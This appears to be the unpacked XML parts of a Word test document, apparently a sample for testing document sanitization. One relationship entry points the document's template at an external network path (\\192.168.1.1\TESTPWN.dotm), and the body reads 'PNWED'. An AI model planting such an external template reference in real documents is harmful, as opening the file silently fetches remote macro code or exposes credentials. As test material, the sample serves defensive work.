
<file path=Votiro_External_Document_Reference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Votiro_External_Document_Reference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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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Votiro_External_Document_Reference/docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>{4C741F79-B130-4B61-8722-FE4E0F163F0B}tf02786999_win32.dotx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Votiro_External_Document_Reference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TestUser</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Paul Stasiuk</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-03T22:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-03T22:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=Votiro_External_Document_Reference/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

<file path=Votiro_External_Document_Reference/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Votiro_External_Document_Reference/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\\192.168.1.1\TESTPWN.dotm" TargetMode="External"/></Relationships>
</file>

<file path=Votiro_External_Document_Reference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13A6" w14:textId="19043EC9" w:rsidR="00A9204E" w:rsidRDefault="00284CDF">
      <w:r>
        <w:t>PNWED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Votiro_External_Document_Reference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Votiro_External_Document_Reference/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Votiro_External_Document_Reference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DF"/>
    <w:rsid w:val="00284CDF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2E16"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BD096C57-50DD-4D26-86EB-5131260D5CDE}"/>
</w:settings>
</file>

<file path=Votiro_External_Document_Reference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Votiro_External_Document_Reference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Votiro_External_Document_Reference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